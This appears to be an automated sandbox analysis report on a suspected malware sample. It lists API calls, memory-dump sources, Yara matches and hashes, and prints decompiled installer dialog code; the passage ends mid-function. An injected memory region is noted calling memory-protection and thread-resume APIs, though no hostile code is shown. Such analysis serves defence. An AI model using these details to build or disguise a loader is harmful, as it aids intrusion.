                                                                                                                          0x0040224a
                                                                                                                          0x0040224d
                                                                                                                          0x00402253
                                                                                                                          0x00402261
                                                                                                                          0x00402264
                                                                                                                          0x00402266
                                                                                                                          0x00402271
                                                                                                                          0x00402271
                                                                                                                          0x00402276
                                                                                                                          0x00402278
                                                                                                                          0x0040227f
                                                                                                                          0x0040227f
                                                                                                                          0x00402282
                                                                                                                          0x0040228b
                                                                                                                          0x0040228e
                                                                                                                          0x00402294
                                                                                                                          0x00402296
                                                                                                                          0x004022a0
                                                                                                                          0x004022a0
                                                                                                                          0x004022a3
                                                                                                                          0x004022ac
                                                                                                                          0x004022af
                                                                                                                          0x004022b8
                                                                                                                          0x004022be
                                                                                                                          0x004022c0
                                                                                                                          0x004022ce
                                                                                                                          0x004022ce
                                                                                                                          0x004022d1
                                                                                                                          0x004022d7
                                                                                                                          0x004022d7
                                                                                                                          0x004022da
                                                                                                                          0x004022e0
                                                                                                                          0x004022e6
                                                                                                                          0x004022fb
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004022e6
                                                                                                                          0x004022f1
                                                                                                                          0x00402c2d
                                                                                                                          0x00402c39

                                                                                                                          APIs
                                                                                                                          • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Psychopharmacology, xrefs: 00402269
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateInstance
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Psychopharmacology
                                                                                                                          • API String ID: 542301482-3859282073
                                                                                                                          • Opcode ID: b0f56d83aa92b34fab7c8b7833f3f9280e955cbd7970a0c8ce0b1118276af6e5
                                                                                                                          • Instruction ID: f110e38d5ccd8909b9e85e2ea6b1342c5fae2602ce40754bea02e3b472428d32
                                                                                                                          • Opcode Fuzzy Hash: b0f56d83aa92b34fab7c8b7833f3f9280e955cbd7970a0c8ce0b1118276af6e5
                                                                                                                          • Instruction Fuzzy Hash: BC411771A00209EFCF40DFE4C989E9D7BB5BF49304B20456AF505EB2D1DB799981CB94
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0040699E(WCHAR* _a4) {
                                                                                                                          				void* _t2;
                                                                                                                          
                                                                                                                          				_t2 = FindFirstFileW(_a4, 0x426798); // executed
                                                                                                                          				if(_t2 == 0xffffffff) {
                                                                                                                          					return 0;
                                                                                                                          				}
                                                                                                                          				FindClose(_t2);
                                                                                                                          				return 0x426798;
                                                                                                                          			}




                                                                                                                          0x004069a9
                                                                                                                          0x004069b2
                                                                                                                          0x00000000
                                                                                                                          0x004069bf
                                                                                                                          0x004069b5
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • FindFirstFileW.KERNELBASE(75AA3420,00426798,00425F50,00406088,00425F50,00425F50,00000000,00425F50,00425F50,75AA3420,?,75AA2EE0,00405D94,?,75AA3420,75AA2EE0), ref: 004069A9
                                                                                                                          • FindClose.KERNEL32(00000000), ref: 004069B5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2295610775-0
                                                                                                                          • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                                                                                          • Instruction ID: 0ca7534fdffec89160a31ceabb6ef5ff718bfc83d1618d69d17f9e635378cbc3
                                                                                                                          • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                                                                                          • Instruction Fuzzy Hash: 5ED012B15192205FC34057387E0C84B7A989F563317268A36B4AAF11E0CB348C3297AC
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: iX`$s<
                                                                                                                          • API String ID: 0-140371403
                                                                                                                          • Opcode ID: 826dc383bd58de2cc13b522eb1c7f5879523ef12fe068e38d62ddf851f840ffa
                                                                                                                          • Instruction ID: 4af180ad8dfab4b5194d30f3a2efe55c99d310fe5d8e3999d7a535d2f8ff790c
                                                                                                                          • Opcode Fuzzy Hash: 826dc383bd58de2cc13b522eb1c7f5879523ef12fe068e38d62ddf851f840ffa
                                                                                                                          • Instruction Fuzzy Hash: A4E12675A0474A9FDF34DE6CCD943DA37A6AFA9350F99412ACC89DF204D3318A82CB45
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • CreateFileA.KERNELBASE(?,4C2F61BE,92FA589B,6605CEC6), ref: 034AB9D0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 823142352-0
                                                                                                                          • Opcode ID: cd66fa8eae2a6ca33c5b2154cb4750965ab29def85c7b7be86eb440dd7d81869
                                                                                                                          • Instruction ID: 3f5965615560f77780b369a401088592212456b9c635d2585fcf80d56ab629c1
                                                                                                                          • Opcode Fuzzy Hash: cd66fa8eae2a6ca33c5b2154cb4750965ab29def85c7b7be86eb440dd7d81869
                                                                                                                          • Instruction Fuzzy Hash: 0521ED712496488FEB60CE3988557EB77A6AFA5380F91C52ECC969B254D3300A828B46
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • NtResumeThread.NTDLL(00000001,034B09C9), ref: 034B0083
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ResumeThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 947044025-0
                                                                                                                          • Opcode ID: f7ed57f52e0f929fe67b5008106af67131b4134e54f06f13195f50c772512724
                                                                                                                          • Instruction ID: eb5cd661676385eea475a069cdc3da354c94da9115fe31ca29642fd3e752cd31
                                                                                                                          • Opcode Fuzzy Hash: f7ed57f52e0f929fe67b5008106af67131b4134e54f06f13195f50c772512724
                                                                                                                          • Instruction Fuzzy Hash: B311E531504706CADF38DD2889943EB2376ABA6351F60822BCD678F648DB3589478619
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: s<
                                                                                                                          • API String ID: 0-2412033744
                                                                                                                          • Opcode ID: a78b1f3dc091b298666418f8d1c8bace4510e8a2d9aabddc5eb7f6a9d95ac874
                                                                                                                          • Instruction ID: 52f6e635debd6b4cf0abb34ccc2e713de7b83dbe8df4a70a529a4c89d107ebdf
                                                                                                                          • Opcode Fuzzy Hash: a78b1f3dc091b298666418f8d1c8bace4510e8a2d9aabddc5eb7f6a9d95ac874
                                                                                                                          • Instruction Fuzzy Hash: 61B12E716043459FDB64DE28C8957EA7BB2BF65310F95416FD89ACF210C77089828B4A
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • NtProtectVirtualMemory.NTDLL ref: 034AF0E4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: MemoryProtectVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2706961497-0
                                                                                                                          • Opcode ID: be3996d3c81c1931fe5ea6146aadd4d252e81368070fbc64cfd54d60da70d283
                                                                                                                          • Instruction ID: ff682aebbd129e457ad6ba120e3631c7b1792b4ae17631631c3efcdb0ecc19f8
                                                                                                                          • Opcode Fuzzy Hash: be3996d3c81c1931fe5ea6146aadd4d252e81368070fbc64cfd54d60da70d283
                                                                                                                          • Instruction Fuzzy Hash: 3E018CB16082948FDB64CF1CDD487EA77E9EF98300F44812AEC89EB200D3306E01CB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: s<
                                                                                                                          • API String ID: 0-2412033744
                                                                                                                          • Opcode ID: 12b57b1a38c5d3c2ddd04e704451a850940fbd01502dca9306eb7fae559f9e38
                                                                                                                          • Instruction ID: 73a4f0d531d9fda99d6308e4f6be6eb3189a36482dfd9e933344efc54f969c75
                                                                                                                          • Opcode Fuzzy Hash: 12b57b1a38c5d3c2ddd04e704451a850940fbd01502dca9306eb7fae559f9e38
                                                                                                                          • Instruction Fuzzy Hash: BDA1DD75A047999FDB70DE2C88943EA37A6EF25350F94412FDC99EF240D7308A828B45
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: s<
                                                                                                                          • API String ID: 0-2412033744
                                                                                                                          • Opcode ID: a4b1e06d01c840394377d162a120ae20e0e568e9450a72e3d7c1149b6e657b67
                                                                                                                          • Instruction ID: 795aa828cbf3b602ee709d0775f384feffcdf1eec1aaea3cc523c019d0b68245
                                                                                                                          • Opcode Fuzzy Hash: a4b1e06d01c840394377d162a120ae20e0e568e9450a72e3d7c1149b6e657b67
                                                                                                                          • Instruction Fuzzy Hash: 27910472A407498FDF70DE2C8CA47DA37A6AF2A350F89416ADC99DB304D3318D858B45
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: s<
                                                                                                                          • API String ID: 0-2412033744
                                                                                                                          • Opcode ID: 605392defc3248cfbf2363506064c98f1ca1784f9353bed4bbe3c9cfdddbea97
                                                                                                                          • Instruction ID: e4c43574ca5a9685be48774485ee45eabe63ff7c42f1c6f219d588cb7cf7f3b8
                                                                                                                          • Opcode Fuzzy Hash: 605392defc3248cfbf2363506064c98f1ca1784f9353bed4bbe3c9cfdddbea97
                                                                                                                          • Instruction Fuzzy Hash: 3481C075A046599FCB74DF2CC8907EA77A6AF68350F99402EEC89DF300D7309E828B45
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: s<
                                                                                                                          • API String ID: 0-2412033744
                                                                                                                          • Opcode ID: 8432212b5274ac9a6afc242c3fe642b4cc5b648ad3262c06265e552627b402b7
                                                                                                                          • Instruction ID: d3f4ccaeda8bef8220459dc39c1e1edb7dd6048595343217ecd83049ef00f430
                                                                                                                          • Opcode Fuzzy Hash: 8432212b5274ac9a6afc242c3fe642b4cc5b648ad3262c06265e552627b402b7
                                                                                                                          • Instruction Fuzzy Hash: 48812671A0C7C55FCB32DE388CA93DA7FA66F62200F58819FDC898F686D3648941C756
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: s<
                                                                                                                          • API String ID: 0-2412033744
                                                                                                                          • Opcode ID: 4aa41213fee7abf579e5f76152aabdfb696e4fa3a49fdeaf03504f6b1ef9cdf4
                                                                                                                          • Instruction ID: 86fa7fd10fbd3b959ff6d3003ffc414bf4dee004b7e6998d4f909d33f6b8f757
                                                                                                                          • Opcode Fuzzy Hash: 4aa41213fee7abf579e5f76152aabdfb696e4fa3a49fdeaf03504f6b1ef9cdf4
                                                                                                                          • Instruction Fuzzy Hash: EF612476A0475A9BCB70DE2C88E03EB77E6AF65350F99412EDC89DB340D7318D428745
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33053967361.0000000003490000.00000040.00001000.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_3490000_SecuriteInfo.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: s<
                                                                                                                          • API String ID: 0-2412033744
                                                                                                                          • Opcode ID: 338db1d7879492d234537d09ceba79f8b5b65deed150a47c6c2b2fe9c8d6107b
                                                                                                                          • Instruction ID: 38bdc0a8ad91b746b175107da62709aba8f6254ad15614e6ecd6e9535716f057
                                                                                                                          • Opcode Fuzzy Hash: 338db1d7879492d234537d09ceba79f8b5b65deed150a47c6c2b2fe9c8d6107b
                                                                                                                          • Instruction Fuzzy Hash: 005104756047459FCF74EE2C88A03EA37A6AF65350F98402FDC89DF344D7308A868B45
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 194 4040c5-4040d7 195 4040dd-4040e3 194->195 196 40423e-40424d 194->196 195->196 197 4040e9-4040f2 195->197 198 40429c-4042b1 196->198 199 40424f-404297 GetDlgItem * 2 call 4045c4 SetClassLongW call 40140b 196->199 200 4040f4-404101 SetWindowPos 197->200 201 404107-40410e 197->201 203 4042f1-4042f6 call 404610 198->203 204 4042b3-4042b6 198->204 199->198 200->201 206 404110-40412a ShowWindow 201->206 207 404152-404158 201->207 212 4042fb-404316 203->212 209 4042b8-4042c3 call 401389 204->209 210 4042e9-4042eb 204->210 213 404130-404143 GetWindowLongW 206->213 214 40422b-404239 call 40462b 206->214 215 404171-404174 207->215 216 40415a-40416c DestroyWindow 207->216 209->210 229 4042c5-4042e4 SendMessageW 209->229 210->203 211 404591 210->211 224 404593-40459a 211->224 221 404318-40431a call 40140b 212->221 222 40431f-404325 212->222 213->214 223 404149-40414c ShowWindow 213->223 214->224 227 404176-404182 SetWindowLongW 215->227 228 404187-40418d 215->228 225 40456e-404574 216->225 221->222 233 40432b-404336 222->233 234 40454f-404568 DestroyWindow EndDialog 222->234 223->207 225->211 232 404576-40457c 225->232 227->224 228->214 235 404193-4041a2 GetDlgItem 228->235 229->224 232->211 236 40457e-404587 ShowWindow 232->236 233->234 237 40433c-404389 call 4066a5 call 4045c4 * 3 GetDlgItem 233->237 234->225 238 4041c1-4041c4 235->238 239 4041a4-4041bb SendMessageW IsWindowEnabled 235->239 236->211 266 404393-4043cf ShowWindow KiUserCallbackDispatcher call 4045e6 EnableWindow 237->266 267 40438b-404390 237->267 240 4041c6-4041c7 238->240 241 4041c9-4041cc 238->241 239->211 239->238 243 4041f7-4041fc call 40459d 240->243 244 4041da-4041df 241->244 245 4041ce-4041d4 241->245 243->214 247 404215-404225 SendMessageW 244->247 249 4041e1-4041e7 244->249 245->247 248 4041d6-4041d8 245->248 247->214 248->243 252 4041e9-4041ef call 40140b 249->252 253 4041fe-404207 call 40140b 249->253 264 4041f5 252->264 253->214 262 404209-404213 253->262 262->264 264->243 270 4043d1-4043d2 266->270 271 4043d4 266->271 267->266 272 4043d6-404404 GetSystemMenu EnableMenuItem SendMessageW 270->272 271->272 273 404406-404417 SendMessageW 272->273 274 404419 272->274 275 40441f-40445e call 4045f9 call 4040a6 call 406668 lstrlenW call 4066a5 SetWindowTextW call 401389 273->275 274->275 275->212 286 404464-404466 275->286 286->212 287 40446c-404470 286->287 288 404472-404478 287->288 289 40448f-4044a3 DestroyWindow 287->289 288->211 290 40447e-404484 288->290 289->225 291 4044a9-4044d6 CreateDialogParamW 289->291 290->212 292 40448a 290->292 291->225 293 4044dc-404533 call 4045c4 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 291->293 292->211 293->211 298 404535-404548 ShowWindow call 404610 293->298 300 40454d 298->300 300->225
                                                                                                                          C-Code - Quality: 86%
                                                                                                                          			E004040C5(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                                                                                                                          				struct HWND__* _v28;
                                                                                                                          				void* _v80;
                                                                                                                          				void* _v84;
                                                                                                                          				void* __ebx;
                                                                                                                          				void* __edi;
                                                                                                                          				void* __esi;
                                                                                                                          				signed int _t34;
                                                                                                                          				signed int _t36;
                                                                                                                          				signed int _t38;
                                                                                                                          				struct HWND__* _t48;
                                                                                                                          				signed int _t67;
                                                                                                                          				struct HWND__* _t73;
                                                                                                                          				signed int _t86;
                                                                                                                          				struct HWND__* _t91;
                                                                                                                          				signed int _t99;
                                                                                                                          				int _t103;
                                                                                                                          				signed int _t117;
                                                                                                                          				int _t118;
                                                                                                                          				int _t122;
                                                                                                                          				signed int _t124;
                                                                                                                          				struct HWND__* _t127;
                                                                                                                          				struct HWND__* _t128;
                                                                                                                          				int _t129;
                                                                                                                          				intOrPtr _t130;
                                                                                                                          				long _t133;
                                                                                                                          				int _t135;
                                                                                                                          				int _t136;
                                                                                                                          				void* _t137;
                                                                                                                          
                                                                                                                          				_t130 = _a8;
                                                                                                                          				if(_t130 == 0x110 || _t130 == 0x408) {
                                                                                                                          					_t34 = _a12;
                                                                                                                          					_t127 = _a4;
                                                                                                                          					__eflags = _t130 - 0x110;
                                                                                                                          					 *0x423730 = _t34;
                                                                                                                          					if(_t130 == 0x110) {
                                                                                                                          						 *0x42a268 = _t127;
                                                                                                                          						 *0x423744 = GetDlgItem(_t127, 1);
                                                                                                                          						_t91 = GetDlgItem(_t127, 2);
                                                                                                                          						_push(0xffffffff);
                                                                                                                          						_push(0x1c);
                                                                                                                          						 *0x421710 = _t91;
                                                                                                                          						E004045C4(_t127);
                                                                                                                          						SetClassLongW(_t127, 0xfffffff2,  *0x429248);
                                                                                                                          						 *0x42922c = E0040140B(4);
                                                                                                                          						_t34 = 1;
                                                                                                                          						__eflags = 1;
                                                                                                                          						 *0x423730 = 1;
                                                                                                                          					}
                                                                                                                          					_t124 =  *0x40a39c; // 0x2
                                                                                                                          					_t136 = 0;
                                                                                                                          					_t133 = (_t124 << 6) +  *0x42a280;
                                                                                                                          					__eflags = _t124;
                                                                                                                          					if(_t124 < 0) {
                                                                                                                          						L36:
                                                                                                                          						E00404610(0x40b);
                                                                                                                          						while(1) {
                                                                                                                          							_t36 =  *0x423730;
                                                                                                                          							 *0x40a39c =  *0x40a39c + _t36;
                                                                                                                          							_t133 = _t133 + (_t36 << 6);
                                                                                                                          							_t38 =  *0x40a39c; // 0x2
                                                                                                                          							__eflags = _t38 -  *0x42a284;
                                                                                                                          							if(_t38 ==  *0x42a284) {
                                                                                                                          								E0040140B(1);
                                                                                                                          							}
                                                                                                                          							__eflags =  *0x42922c - _t136;
                                                                                                                          							if( *0x42922c != _t136) {
                                                                                                                          								break;
                                                                                                                          							}
                                                                                                                          							__eflags =  *0x40a39c -  *0x42a284; // 0x2
                                                                                                                          							if(__eflags >= 0) {
                                                                                                                          								break;
                                                                                                                          							}
                                                                                                                          							_t117 =  *(_t133 + 0x14);
                                                                                                                          							E004066A5(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
                                                                                                                          							_push( *((intOrPtr*)(_t133 + 0x20)));
                                                                                                                          							_push(0xfffffc19);
                                                                                                                          							E004045C4(_t127);
                                                                                                                          							_push( *((intOrPtr*)(_t133 + 0x1c)));
                                                                                                                          							_push(0xfffffc1b);
                                                                                                                          							E004045C4(_t127);
                                                                                                                          							_push( *((intOrPtr*)(_t133 + 0x28)));
                                                                                                                          							_push(0xfffffc1a);
                                                                                                                          							E004045C4(_t127);
                                                                                                                          							_t48 = GetDlgItem(_t127, 3);
                                                                                                                          							__eflags =  *0x42a2ec - _t136;
                                                                                                                          							_v28 = _t48;
                                                                                                                          							if( *0x42a2ec != _t136) {
                                                                                                                          								_t117 = _t117 & 0x0000fefd | 0x00000004;
                                                                                                                          								__eflags = _t117;
                                                                                                                          							}
                                                                                                                          							ShowWindow(_t48, _t117 & 0x00000008); // executed
                                                                                                                          							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100); // executed
                                                                                                                          							E004045E6(_t117 & 0x00000002);
                                                                                                                          							_t118 = _t117 & 0x00000004;
                                                                                                                          							EnableWindow( *0x421710, _t118);
                                                                                                                          							__eflags = _t118 - _t136;
                                                                                                                          							if(_t118 == _t136) {
                                                                                                                          								_push(1);
                                                                                                                          							} else {
                                                                                                                          								_push(_t136);
                                                                                                                          							}
                                                                                                                          							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
                                                                                                                          							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
                                                                                                                          							__eflags =  *0x42a2ec - _t136;
                                                                                                                          							if( *0x42a2ec == _t136) {
                                                                                                                          								_push( *0x423744);
                                                                                                                          							} else {
                                                                                                                          								SendMessageW(_t127, 0x401, 2, _t136);
                                                                                                                          								_push( *0x421710);
                                                                                                                          							}
                                                                                                                          							E004045F9();
                                                                                                                          							E00406668(0x423748, E004040A6());
                                                                                                                          							E004066A5(0x423748, _t127, _t133,  &(0x423748[lstrlenW(0x423748)]),  *((intOrPtr*)(_t133 + 0x18)));
                                                                                                                          							SetWindowTextW(_t127, 0x423748); // executed
                                                                                                                          							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)), _t136);
                                                                                                                          							__eflags = _t67;
                                                                                                                          							if(_t67 != 0) {
                                                                                                                          								continue;
                                                                                                                          							} else {
                                                                                                                          								__eflags =  *_t133 - _t136;
                                                                                                                          								if( *_t133 == _t136) {
                                                                                                                          									continue;
                                                                                                                          								}
                                                                                                                          								__eflags =  *(_t133 + 4) - 5;
                                                                                                                          								if( *(_t133 + 4) != 5) {
                                                                                                                          									DestroyWindow( *0x429238); // executed
                                                                                                                          									 *0x422720 = _t133;
                                                                                                                          									__eflags =  *_t133 - _t136;
                                                                                                                          									if( *_t133 <= _t136) {
                                                                                                                          										goto L60;
                                                                                                                          									}
                                                                                                                          									_t73 = CreateDialogParamW( *0x42a260,  *_t133 +  *0x429240 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133); // executed
                                                                                                                          									__eflags = _t73 - _t136;
                                                                                                                          									 *0x429238 = _t73;
                                                                                                                          									if(_t73 == _t136) {
                                                                                                                          										goto L60;
                                                                                                                          									}
                                                                                                                          									_push( *((intOrPtr*)(_t133 + 0x2c)));
                                                                                                                          									_push(6);
                                                                                                                          									E004045C4(_t73);
                                                                                                                          									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
                                                                                                                          									ScreenToClient(_t127, _t137 + 0x10);
                                                                                                                          									SetWindowPos( *0x429238, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                                                                                                                          									E00401389( *((intOrPtr*)(_t133 + 0xc)), _t136);
                                                                                                                          									__eflags =  *0x42922c - _t136;
                                                                                                                          									if( *0x42922c != _t136) {
                                                                                                                          										goto L63;
                                                                                                                          									}
                                                                                                                          									ShowWindow( *0x429238, 8); // executed
                                                                                                                          									E00404610(0x405);
                                                                                                                          									goto L60;
                                                                                                                          								}
                                                                                                                          								__eflags =  *0x42a2ec - _t136;
                                                                                                                          								if( *0x42a2ec != _t136) {
                                                                                                                          									goto L63;
                                                                                                                          								}
                                                                                                                          								__eflags =  *0x42a2e0 - _t136;
                                                                                                                          								if( *0x42a2e0 != _t136) {
                                                                                                                          									continue;
                                                                                                                          								}
                                                                                                                          								goto L63;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						DestroyWindow( *0x429238);
                                                                                                                          						 *0x42a268 = _t136;
                                                                                                                          						EndDialog(_t127,  *0x421f18);
                                                                                                                          						goto L60;
                                                                                                                          					} else {
                                                                                                                          						__eflags = _t34 - 1;
                                                                                                                          						if(_t34 != 1) {
                                                                                                                          							L35:
                                                                                                                          							__eflags =  *_t133 - _t136;
                                                                                                                          							if( *_t133 == _t136) {
                                                                                                                          								goto L63;
                                                                                                                          							}
                                                                                                                          							goto L36;
                                                                                                                          						}
                                                                                                                          						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)), 0);
                                                                                                                          						__eflags = _t86;
                                                                                                                          						if(_t86 == 0) {
                                                                                                                          							goto L35;
                                                                                                                          						}
                                                                                                                          						SendMessageW( *0x429238, 0x40f, 0, 1);
                                                                                                                          						__eflags =  *0x42922c;
